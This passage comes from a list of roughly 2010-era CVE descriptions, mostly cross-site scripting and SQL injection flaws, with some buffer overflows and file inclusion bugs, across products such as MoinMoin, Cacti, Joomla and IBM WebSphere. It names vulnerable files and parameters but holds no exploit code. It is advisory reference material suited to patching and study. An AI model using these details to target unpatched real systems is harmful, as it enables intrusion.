parameter to application/modules/admin/controllers/posts.php, as reachable by admin/posts/edit [CVE-2010-3023] Multiple cross-site scripting (XSS) vulnerabilities in DiamondList 0.1.6, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) category[description] parameter to user/main/update_category, which is not properly handled by _app/views/categories/index.html.erb [CVE-2010-3022] Cross-site scripting (XSS) vulnerability in the Performance logging module in the Devel module 5.x before 5.x-1.3 and 6.x before 6.x-1.21 for Drupal allows remote authenticated users, with add url aliases and report access permissions, to inject arbitrary web script or HTML via crafted node paths in a URL. [CVE-2010-3012] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue was originally assigned CVE-2010-3010 due to a CNA error. [CVE-2010-3010] Cross-site scripting (XSS) vulnerability on the HP 3Com OfficeConnect Gigabit VPN Firewall 3CREVF100-73 with firmware before 1.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: a separate XSS issue for HP System Management Homepage (SMH) was originally assigned CVE-2010-3010 due to a CNA error, but CVE-2010-3012 is the appropriate identifier for the SMH issue. [CVE-2010-3003] Cross-site scripting (XSS) vulnerability in HP Insight Diagnostics Online Edition before 8.5.0-11 on Linux allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2991] The IICAClient interface in the ICAClient library in the ICA Client ActiveX Object (aka ICO) component in Citrix Online Plug-in for Windows for XenApp & XenDesktop before 12.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HTML document that triggers the reading of a .ICA file. [CVE-2010-2989] nessusd_www_server.nbin in the Nessus Web Server plugin 1.2.4 for Nessus allows remote attackers to obtain sensitive information via a request to the /feed method, which reveals the version in a response. [CVE-2010-2988] Cross-site scripting (XSS) vulnerability in Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCtf35333. [CVE-2010-2987] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Wireless Control System (WCS) 7.x before 7.0.164, as used in Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCtg33854. [CVE-2010-2985] Multiple cross-site scripting (XSS) vulnerabilities in IBM WebSphere Service Registry and Repository (WSRR) 6.3 allow remote attackers to inject arbitrary web script or HTML via (1) the searchTerm parameter to ServiceRegistry/HelpSearch.do or (2) the queryItems[0].value parameter to ServiceRegistry/QueryWizardProcessStep1.do. [CVE-2010-2984] Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0 on 4404 series controllers does not properly implement the WEBAUTH_REQD state, which allows remote attackers to bypass intended access restrictions via WLAN traffic, aka Bug ID CSCtb75305. [CVE-2010-2981] Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0 allows remote attackers to cause a denial of service (device crash) by pinging a virtual interface, aka Bug ID CSCte55370. [CVE-2010-2974] Stack-based buffer overflow in the IConfigurationAccess interface in the Invensys Wonderware Archestra ConfigurationAccessComponent ActiveX control in Wonderware Application Server (WAS) before 3.1 SP2 P01, as used in the Wonderware Archestra Integrated Development Environment (IDE) and the InFusion Integrated Engineering Environment (IEE), allows remote attackers to execute arbitrary code via the first argument to the UnsubscribeData method. [CVE-2010-2970] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/SlideShow.py, (2) action/anywikidraw.py, and (3) action/language_setup.py, a similar issue to CVE-2010-2487. [CVE-2010-2969] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, and 1.9.x before 1.9.3, allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/LikePages.py, (2) action/chart.py, and (3) action/userprofile.py, a similar issue to CVE-2010-2487. [CVE-2010-2962] drivers/gpu/drm/i915/i915_gem.c in the Graphics Execution Manager (GEM) in the Intel i915 driver in the Direct Rendering Manager (DRM) subsystem in the Linux kernel before 2.6.36 does not properly validate pointers to blocks of memory, which allows local users to write to arbitrary kernel memory locations, and consequently gain privileges, via crafted use of the ioctl interface, related to (1) pwrite and (2) pread operations. [CVE-2010-2958] Cross-site scripting (XSS) vulnerability in libraries/Error.class.php in phpMyAdmin 3.x before 3.3.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to a PHP backtrace and error messages (aka debugging messages), a different vulnerability than CVE-2010-3056. [CVE-2010-2957] Cross-site scripting (XSS) vulnerability in Serendipity before 1.5.4, when "Remember me" logins are enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2917] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AJ Square AJ Article 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) emailid, (2) fname, (3) lname, (4) company, (5) address1, (6) address2, (7) city, (8) state, (9) zipcode, (10) phone, and (11) fax parameters in an update action. NOTE: some of these details are obtained from third party information. [CVE-2010-2914] Cross-site scripting (XSS) vulnerability in nessusd_www_server.nbin in the Nessus Web Server plugin 1.2.4 for Nessus allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2904] Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp. [CVE-2010-2886] Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp 7 and 8, and RoboHelp Server 7 and 8, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2885] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 7 and 8, and RoboHelp Server 7 and 8, allows remote attackers to inject arbitrary web script or HTML via vectors related to WebHelp generation with RoboHelp for Word. [CVE-2010-2858] Multiple cross-site scripting (XSS) vulnerabilities in news.php in SimpNews 2.47.03 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) layout and (2) sortorder parameters. [CVE-2010-2856] Cross-site scripting (XSS) vulnerability in admin/currencies.php in osCSS 1.2.2, and probably earlier versions, allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2010-2854] Multiple cross-site scripting (XSS) vulnerabilities in modfile.php in Event Horizon (EVH) 1.1.10, when magic_quotes_gpc is disabled, allow remote attackers to inject arbitrary web script or HTML via the (1) YourEmail and (2) VerificationNumber parameters, which are not properly handled in a forced SQL error message. NOTE: some of these details are obtained from third party information. [CVE-2010-2852] Cross-site scripting (XSS) vulnerability in modules/headlines/magpierss/scripts/magpie_debug.php in RunCms 2.1, when the Headlines module is enabled, allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2010-2849] Cross-site scripting (XSS) vulnerability in productionnu2/nuedit.php in nuBuilder 10.04.20, and possibly other versions before 10.07.12, allows remote attackers to inject arbitrary web script or HTML via the f parameter. [CVE-2010-2846] Cross-site scripting (XSS) vulnerability in the InterJoomla ArtForms (com_artforms) component 2.1b7.2 RC2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the afmsg parameter to index.php. [CVE-2010-2844] Cross-site scripting (XSS) vulnerability in news_show.php in Newanz NewsOffice 2.0.18 allows remote attackers to inject arbitrary web script or HTML via the n-cat parameter. [CVE-2010-2802] Cross-site scripting (XSS) vulnerability in MantisBT before 1.2.2 allows remote authenticated users to inject arbitrary web script or HTML via an HTML document with a .gif filename extension, related to inline attachments. [CVE-2010-2796] Cross-site scripting (XSS) vulnerability in phpCAS before 1.1.2, when proxy mode is enabled, allows remote attackers to inject arbitrary web script or HTML via a callback URL. [CVE-2010-2790] Multiple cross-site scripting (XSS) vulnerabilities in the formatQuery function in frontends/php/include/classes/class.curl.php in Zabbix before 1.8.3rc1 allow remote attackers to inject arbitrary web script or HTML via the (1) filter_set, (2) show_details, (3) filter_rst, or (4) txt_select parameters to the triggers page (tr_status.php). NOTE: some of these details are obtained from third party information. [CVE-2010-2788] Cross-site scripting (XSS) vulnerability in profileinfo.php in MediaWiki before 1.15.5, when wgEnableProfileInfo is enabled, allows remote attackers to inject arbitrary web script or HTML via the filter parameter. [CVE-2010-2779] Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupWise 8.x before 8.0 SP2 allows remote attackers to inject arbitrary web script or HTML via a crafted message, related to "replies." [CVE-2010-2778] Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupWise 7.x before 7.0 post-SP4 FTF and 8.x before 8.0 SP2 allows remote attackers to inject arbitrary web script or HTML via a crafted message, related to a "Javascript XSS exploit." [CVE-2010-2769] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 allows user-assisted remote attackers to inject arbitrary web script or HTML via a selection that is added to a document in which the designMode property is enabled. [CVE-2010-2764] Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 do not properly restrict read access to the statusText property of XMLHttpRequest objects, which allows remote attackers to discover the existence of intranet web servers via cross-origin requests. [CVE-2010-2756] Search.pm in Bugzilla 2.19.1 through 3.2.7, 3.3.1 through 3.4.7, 3.5.1 through 3.6.1, and 3.7 through 3.7.2 allows remote attackers to determine the group memberships of arbitrary users via vectors involving the Search interface, boolean charts, and group-based pronouns. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2734] Cross-site scripting (XSS) vulnerability in the mobile portal in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability." [CVE-2010-2733] Cross-site scripting (XSS) vulnerability in the Web Monitor in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "UAG XSS Allows EOP Vulnerability." [CVE-2010-2724] Cross-site scripting (XSS) vulnerability in the Hierarchical Select module 5.x before 5.x-3.2 and 6.x before 6.x-3.2 for Drupal allows remote authenticated users, with administer taxonomy permissions, to inject arbitrary web script or HTML via unspecified vectors in the hierarchical_select form. [CVE-2010-2723] Cross-site scripting (XSS) vulnerability in LISTSERV 15 and 16 allows remote attackers to inject arbitrary web script or HTML via the T parameter. NOTE: the provenance of this information is unknown [CVE-2010-2722] Cross-site scripting (XSS) vulnerability in index.php in RightInPoint Lyrics Script 3.0 allows remote attackers to inject arbitrary web script or HTML via the artist_id parameter, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown [CVE-2010-2718] Multiple cross-site scripting (XSS) vulnerabilities in CruxSoftware CruxPA 2.00, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) txtusername parameter to login.php, (2) todo parameter to newtodo.php, and unspecified vectors to (3) newtelephone.php and (4) newappointment.php. [CVE-2010-2717] Cross-site scripting (XSS) vulnerability in manager/login.php in CruxSoftware CruxCMS 3.0, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the txtusername parameter. [CVE-2010-2715] Cross-site scripting (XSS) vulnerability in photos/index.php in TCW PHP Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the album parameter. [CVE-2010-2709] Stack-based buffer overflow in webappmon.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via a long OvJavaLocale value in a cookie. [CVE-2010-2703] Stack-based buffer overflow in the execvp_nc function in the ov.dll module in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53, when running on Windows, allows remote attackers to execute arbitrary code via a long HTTP request to webappmon.exe. [CVE-2010-2700] Cross-site scripting (XSS) vulnerability in index.php in Edge PHP Clickbank Affiliate Marketplace Script (CBQuick) allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2010-2698] Multiple cross-site scripting (XSS) vulnerabilities in Sijio Community Software allow remote authenticated users to inject arbitrary web script or HTML via the title parameter when (1) editing a new blog, (2) adding an album, or (3) editing an album. NOTE: the provenance of this information is unknown [CVE-2010-2697] Cross-site scripting (XSS) vulnerability in Sijio Community Software allows remote authenticated users to inject arbitrary web script or HTML via the title parameter when adding a new blog, related to edit_blog/index.php. NOTE: some of these details are obtained from third party information. [CVE-2010-2692] Cross-site scripting (XSS) vulnerability in 2daybiz Custom T-Shirt Design Script allows remote attackers to inject arbitrary web script or HTML via a review comment. [CVE-2010-2689] SQL injection vulnerability in cont_form.php in Internet DM WebDM CMS allows remote attackers to execute arbitrary SQL commands via the cf_id parameter. [CVE-2010-2679] SQL injection vulnerability in the Weblinks (com_weblinks) component in Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view action to index.php. [CVE-2010-2677] PHP remote file inclusion vulnerability in mw_plugin.php in Open Web Analytics (OWA) 1.2.3, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the IP parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-2676] Multiple directory traversal vulnerabilities in index.php in Open Web Analytics (OWA) 1.2.3 might allow remote attackers to read arbitrary files via directory traversal sequences in the (1) owa_action and (2) owa_do parameters. [CVE-2010-2675] Cross-site scripting (XSS) vulnerability in index.php in TSOKA:CMS 1.1, 1.9, and 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter in an articolo action. [CVE-2010-2671] Cross-site scripting (XSS) vulnerability in advancedsearch.php in eZ Publish 3.7.0 through 4.2.0 allows remote attackers to inject arbitrary web script or HTML via the subTreeItem parameter. [CVE-2010-2670] SQL injection vulnerability in recipedetail.php in BrotherScripts Recipe Website allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2010-2669] Cross-site scripting (XSS) vulnerability in admin/editors/text/editor-body.php in Orbis CMS 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2010-2668] Unspecified vulnerability in Adaptive Micro Systems ALPHA Ethernet Adapter II Web-Manager 3.40.2 allows remote attackers to bypass authentication and read or write configuration files via unknown vectors. [CVE-2010-2665] Cross-site scripting (XSS) vulnerability in Opera before 10.54 on Windows and Mac OS X, and before 10.11 on UNIX platforms, allows remote attackers to inject arbitrary web script or HTML via a data: URI, related to incorrect detection of the "opening site." [CVE-2010-2659] Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site. [CVE-2010-2658] Opera before 10.60 does not properly restrict certain interaction between plug-ins, file inputs, and the clipboard, which allows user-assisted remote attackers to trigger the uploading of arbitrary files via a crafted web site. [CVE-2010-2657] Opera before 10.60 on Windows and Mac OS X does not properly prevent certain double-click operations from running a program located on a web site, which allows user-assisted remote attackers to execute arbitrary code via a crafted web page that bypasses a dialog. [CVE-2010-2656] The IBM BladeCenter with Advanced Management Module (AMM) firmware build ID BPET48L, and possibly other versions before 4.7 and 5.0, stores sensitive information under the web root with insufficient access control, which allows remote attackers to download (1) logs or (2) core files via direct requests, as demonstrated by a request for private/sdc.tgz. [CVE-2010-2654] Multiple cross-site scripting (XSS) vulnerabilities on the IBM BladeCenter with Advanced Management Module (AMM) firmware build ID BPET48L, and possibly other versions before 4.7 and 5.0, allow remote attackers to inject arbitrary web script or HTML via the (1) INDEX or (2) IPADDR parameter to private/cindefn.php, (3) the domain parameter to private/power_management_policy_options.php, the slot parameter to (4) private/pm_temp.php or (5) private/power_module.php, (6) the WEBINDEX parameter to private/blade_leds.php, or (7) the SLOT parameter to private/ipmi_bladestatus.php. [CVE-2010-2645] Unspecified vulnerability in Google Chrome before 5.0.375.99, when WebGL is used, allows remote attackers to cause a denial of service (out-of-bounds read) via unknown vectors. [CVE-2010-2639] IBM WebSphere Commerce Enterprise 7.0 before 7.0.0.2 allows remote attackers to read messages intended for other recipients via vectors involving access by the outbound messaging system to the RunTimeProfileCacheCmdImpl class, related to the caching of mutable objects and "concurrency issues." [CVE-2010-2638] Unspecified vulnerability in IBM WebSphere MQ 7.0 before 7.0.1.5 allows remote authenticated users to cause a denial of service (disk consumption) via vectors that trigger an FDC with an RM680004 Probe Id value. [CVE-2010-2637] IBM WebSphere MQ 6.0 before 6.0.2.9 and 7.0 before 7.0.1.1 does not encrypt the username and password in the security parameters field, which allows remote attackers to obtain sensitive information by sniffing the network traffic from a .NET client application. [CVE-2010-2636] Multiple cross-site scripting (XSS) vulnerabilities in sample store pages in IBM WebSphere Commerce 7.0 before 7.0.0.1 allow remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2010-2635] SQL injection vulnerability in IBM WebSphere Commerce 6.0 before 6.0.0.10 allows remote authenticated users to execute arbitrary SQL commands via unspecified parameters to "Commerce Organization Admin Console JavaServer pages." [CVE-2010-2617] Cross-site scripting (XSS) vulnerability in bible.php in PHP Bible Search allows remote attackers to inject arbitrary web script or HTML via the chapter parameter. [CVE-2010-2615] Multiple cross-site scripting (XSS) vulnerabilities in admin/admin.php in Grafik CMS 1.1.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) page_menu and (2) description parameters in an edit_page action. [CVE-2010-2613] Cross-site scripting (XSS) vulnerability in the JExtensions JE Awd Song (com_awd_song) component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the song review field, which is not properly handled in a view action to index.php. [CVE-2010-2599] Unspecified vulnerability in Research In Motion (RIM) BlackBerry Device Software before 6.0.0 allows remote attackers to cause a denial of service (browser hang) via a crafted web page. [CVE-2010-2574] Cross-site scripting (XSS) vulnerability in manage_proj_cat_add.php in MantisBT 1.2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via the name parameter in an Add Category action. [CVE-2010-2545] Multiple cross-site scripting (XSS) vulnerabilities in Cacti before 0.8.7g, as used in Red Hat High Performance Computing (HPC) Solution and other products, allow remote attackers to inject arbitrary web script or HTML via (1) the name element in an XML template to templates_import.php [CVE-2010-2544] Cross-site scripting (XSS) vulnerability in utilities.php in Cacti before 0.8.7g, as used in Red Hat High Performance Computing (HPC) Solution and other products, allows remote attackers to inject arbitrary web script or HTML via the filter parameter. [CVE-2010-2543] Cross-site scripting (XSS) vulnerability in include/top_graph_header.php in Cacti before 0.8.7g allows remote attackers to inject arbitrary web script or HTML via the graph_start parameter to graph.php. NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-4032.2.b. [CVE-2010-2536] Multiple cross-site scripting (XSS) vulnerabilities in rekonq 0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) a URL associated with a nonexistent domain name, related to webpage.cpp, aka a "universal XSS" issue [CVE-2010-2535] Multiple cross-site scripting (XSS) vulnerabilities in the Back End in Joomla! 1.5.x before 1.5.20 allow remote authenticated users to inject arbitrary web script or HTML via administrator screens. [CVE-2010-2514] Cross-site scripting (XSS) vulnerability in the JFaq (com_jfaq) component 1.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the question parameter in an add2 action to index.php. [CVE-2010-2510] SQL injection vulnerability in customize.php in 2daybiz Web Template Software allows remote attackers to execute arbitrary SQL commands via the tid parameter. [CVE-2010-2509] Multiple cross-site scripting (XSS) vulnerabilities in 2daybiz Web Template Software allow remote attackers to inject arbitrary web script or HTML via the (1) keyword parameter to category.php and the (2) password parameter to memberlogin.php. [CVE-2010-2506] Cross-site scripting (XSS) vulnerability in debug.cgi in Linksys WAP54Gv3 firmware 3.05.03 and 3.04.03 allows remote attackers to inject arbitrary web script or HTML via the data1 parameter. [CVE-2010-2505] Soft SaschArt SasCAM Webcam Server 2.6.5, 2.7, and earlier allows remote attackers to cause a denial of service (crash) via a large number of requests with a long line, as demonstrated using a long GET request. [CVE-2010-2503] Multiple cross-site scripting (XSS) vulnerabilities in Splunk 4.0 through 4.0.10 and 4.1 through 4.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) redirects, aka SPL-31067 [CVE-2010-2495] The pppol2tp_xmit function in drivers/net/pppol2tp.c in the L2TP implementation in the Linux kernel before 2.6.34 does not properly validate certain values associated with an interface, which allows attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via vectors related to a routing change. [CVE-2010-2493] The default configuration of the deployment descriptor (aka web.xml) in picketlink-sts.war in (1) the security_saml quickstart, (2) the webservice_proxy_security quickstart, (3) the web-console application, (4) the http-invoker application, (5) the gpd-deployer application, (6) the jbpm-console application, (7) the contract application, and (8) the uddi-console application in JBoss Enterprise SOA Platform before 5.0.2 contains GET and POST http-method elements, which allows remote attackers to bypass intended access restrictions via a crafted HTTP request. [CVE-2010-2491] Cross-site scripting (XSS) vulnerability in cgi/client.py in Roundup before 1.4.14 allows remote attackers to inject arbitrary web script or HTML via the template argument to the /issue program. [CVE-2010-2487] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, 1.8.x before 1.8.8, and 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) Page.py, (2) PageEditor.py, (3) PageGraphicalEditor.py, (4) action/CopyPage.py, (5) action/Load.py, (6) action/RenamePage.py, (7) action/backup.py, (8) action/login.py, (9) action/newaccount.py, and (10) action/recoverpass.py. [CVE-2010-2479] Cross-site scripting (XSS) vulnerability in HTML Purifier before 4.1.1, as used in Mahara and other products, when the browser is Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2477] Multiple cross-site scripting (XSS) vulnerabilities in the paste.httpexceptions implementation in Paste before 1.7.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving a 404 status code, related to (1) paste.urlparser.StaticURLParser, (2) paste.urlparser.PkgResourcesParser, (3) paste.urlmap.URLMap, and (4) HTTPNotFound. [CVE-2010-2470] Install/Filesystem.pm in Bugzilla 3.5.1 through 3.6.1 and 3.7 through 3.7.1, when use_suexec is enabled, uses world-readable permissions within (1) .bzr/ and (2) data/webdot/, which allows local users to obtain potentially sensitive data by reading files in these directories, a different vulnerability than CVE-2010-0180. [CVE-2010-2465] The S2 Security NetBox 2.5, 3.3, and 4.0, as used in the Linear eMerge 50 and 5000 and the Sonitrol eAccess, stores sensitive information under the web root with insufficient access control, which allows remote attackers to download node logs, photographs of persons, and backup files via unspecified HTTP requests. [CVE-2010-2464] Multiple cross-site scripting (XSS) vulnerabilities in the RSComments (com_rscomments) component 1.0.0 Rev 2 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) website and (2) name parameters to index.php. [CVE-2010-2463] Cross-site scripting (XSS) vulnerability in forum.php in Jamroom before 4.1.9 allows remote attackers to inject arbitrary web script or HTML via the post_id parameter in a modify action. [CVE-2010-2458] Cross-site scripting (XSS) vulnerability in video.php in 2daybiz Video Community Portal Script 1.0 allows remote attackers to inject arbitrary web script or HTML via the videoid parameter. [CVE-2010-2457] Cross-site scripting (XSS) vulnerability in index.php in K-Search allows remote attackers to inject arbitrary web script or HTML via the term parameter. [CVE-2010-2448] znc.cpp in ZNC before 0.092 allows remote authenticated users to cause a denial of service (crash) by requesting traffic statistics when there is an active unauthenticated connection, which triggers a NULL pointer dereference, as demonstrated using (1) a traffic link in the web administration pages or (2) the traffic command in the /znc shell. [CVE-2010-2441] WebKit does not properly restrict focus changes, which allows remote attackers to read keystrokes via "cross-domain IFRAME gadgets," a different vulnerability than CVE-2010-1126, CVE-2010-1422, and CVE-2010-2295. [CVE-2010-2437] Cross-site scripting (XSS) vulnerability in class/tools.class.php in AneCMS Blog 1.3 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the comment variable to modules/blog/index.php. [CVE-2010-2435] Weborf HTTP Server 0.12.1 and earlier allows remote attackers to cause a denial of service (crash) via Unicode characters in a Connection HTTP header, and possibly other headers. [CVE-2010-2433] Multiple cross-site scripting (XSS) vulnerabilities in content/internalError.jsp in IBM WebSphere ILOG JRules 6.7 allow remote attackers to inject arbitrary web script or HTML via an RTS URL to (1) explore/explore.jsp, (2) compose/compose.jsp, or (3) home.jsp in faces/. [CVE-2010-2429] Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.1.2, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer in a "404 Not Found" response. [CVE-2010-2422] Cross-site scripting (XSS) vulnerability in PortalTransforms in Plone 2.1 through 3.3.4 before hotfix 20100612 allows remote attackers to inject arbitrary web script or HTML via the safe_html transform. [CVE-2010-2420] Multiple unspecified vulnerabilities in Fenrir Inc. ActiveGeckoBrowser 1.0.0 and 1.0.5 alpha, a module for the Sleipnir web browser, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to the Gecko engine. [CVE-2010-2385] Unspecified vulnerability in Oracle Sun Java System Web Proxy Server 4.0.13 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration Server. [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS. [CVE-2010-2367] Cross-site scripting (XSS) vulnerability in search.cgi in AD-EDIT2 before 3.0.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2366] Cross-site scripting (XSS) vulnerability in futomi CGI Cafe Access Analyzer CGI Professional, and Standard 4.0.2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2365] Cross-site scripting (XSS) vulnerability in Free CGI Moo moobbs2 before 1.03 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2364] Cross-site scripting (XSS) vulnerability in Free CGI Moo moobbs before 1.03 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2359] SQL injection vulnerability in eWebQuiz.asp in ActiveWebSoftwares.com eWebquiz 8 allows remote attackers to execute arbitrary SQL commands via the QuizType parameter, a different vector than CVE-2007-1706. [CVE-2010-2356] Cross-site scripting (XSS) vulnerability in subscribe.php in Pilot Group (PG) eLMS Pro allows remote attackers to inject arbitrary web script or HTML via the course_id parameter. [CVE-2010-2355] Cross-site scripting (XSS) vulnerability in error.php in Pilot Group (PG) eLMS Pro allows remote attackers to inject arbitrary web script or HTML via the message parameter. NOTE: the provenance of this information is unknown [CVE-2010-2349] H264WebCam 3.7 allows remote attackers to cause a denial of service (crash) via a long URI in a GET request, which triggers a NULL pointer dereference. NOTE: some of these details are obtained from third party information. [CVE-2010-2347] The Telnet interface in the SAP J2EE Engine Core (SAP-JEECOR) 6.40 through 7.02, and Server Core (SERVERCORE) 7.10 through 7.30 allows remote authenticated users to bypass a security check and conduct SMB relay attacks via unspecified vectors. [CVE-2010-2344] Multiple cross-site scripting (XSS) vulnerabilities in odCMS 1.06, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the Page parameter to (1) _main/index.php, (2) _members/index.php, (3) _forum/index.php, (4) _docs/index.php, and (5) _announcements/index.php. [CVE-2010-2338] Multiple SQL injection vulnerabilities in redir.asp in VU Web Visitor Analyst allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-2337] Open redirect vulnerability in RSA Federated Identity Manager 4.0 before 4.0.25 and 4.1 before 4.1.26 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unknown vectors. [CVE-2010-2336] index.php in Yamamah Photo Gallery 1.00 allows remote attackers to obtain the source code of executable files within the web document root via the download parameter. [CVE-2010-2333] LiteSpeed Technologies LiteSpeed Web Server 4.0.x before 4.0.15 allows remote attackers to read the source code of scripts via an HTTP request with a null byte followed by a .txt file extension. [CVE-2010-2328] The HTTP Channel in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 allows remote attackers to cause a denial of service (NullPointerException) via a large amount of chunked data that uses gzip compression. [CVE-2010-2327] mod_ibm_ssl in IBM HTTP Server 6.0 before 6.0.2.43, 6.1 before 6.1.0.33, and 7.0 before 7.0.0.11, as used in IBM WebSphere Application Server (WAS) on z/OS, does not properly handle a large HTTP request body in uploading over SSL, which might allow remote attackers to cause a denial of service (daemon fail) via an upload. [CVE-2010-2326] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11, when addNode -trace is used during node federation, allows attackers to obtain sensitive information about CIMMetadataCollectorImpl trace actions by reading the addNode.log file. [CVE-2010-2325] Cross-site scripting (XSS) vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related in part to "URL injection." [CVE-2010-2324] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS allows attackers to perform unspecified "link injection" actions via unknown vectors. [CVE-2010-2323] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS might allow attackers to obtain sensitive information by reading the default_create.log file that is associated with profile creation by the BBOWWPFx job and the zPMT. [CVE-2010-2318] Cross-site scripting (XSS) vulnerability in cms_data.php in PHPCityPortal 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2010-2316] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in WmsCms 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the 